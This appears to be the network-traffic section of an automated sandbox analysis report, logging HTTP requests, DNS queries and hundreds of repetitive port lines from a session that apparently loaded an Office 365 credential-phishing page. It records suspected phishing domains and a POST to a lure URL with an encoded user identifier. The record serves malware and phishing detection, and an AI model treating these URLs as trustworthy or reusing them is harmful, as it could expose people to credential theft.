          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficDNS traffic detected: DNS query: fce0.com
          Source: global trafficDNS traffic detected: DNS query: secmail.bankofamerica.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: skinature.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: unknownHTTP traffic detected: POST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1Host: skinature.comConnection: keep-aliveContent-Length: 48Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://fce0.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://fce0.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 28 Oct 2024 13:02:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
          Source: chromecache_51.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_69.2.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://google.com
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_51.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: chromecache_56.2.drString found in binary or memory: https://secmail.bankofamerica.com/securereader/Image?c=lock&b=1&rnd=0.00823190732671009
          Source: chromecache_56.2.drString found in binary or memory: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N01
          Source: chromecache_70.2.dr, chromecache_51.2.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
